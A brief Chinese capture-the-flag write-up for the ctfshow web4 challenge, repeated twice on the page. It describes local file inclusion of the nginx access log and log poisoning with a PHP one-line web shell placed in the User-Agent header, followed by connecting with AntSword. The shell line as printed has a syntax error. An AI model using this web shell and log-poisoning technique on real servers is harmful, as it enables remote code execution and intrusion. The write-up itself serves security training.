打开之后发现和web3有点像,但是用之前的方法做不出来了
传参url=/var/log/nginx/access.log获取日志目录
使用burpsuite抓包
在User-Agent中加入一句话木马
<?php @eval($_POST['a'];?>
使用蚁剑连接
得到flag
ctfshow{f755138b-0c50-4507-9cb2-67835c95ae08}
相关文章
- 03-02ctfshow-web4
打开之后发现和web3有点像,但是用之前的方法做不出来了
传参url=/var/log/nginx/access.log获取日志目录
使用burpsuite抓包
在User-Agent中加入一句话木马
<?php @eval($_POST['a'];?>
使用蚁剑连接
得到flag
ctfshow{f755138b-0c50-4507-9cb2-67835c95ae08}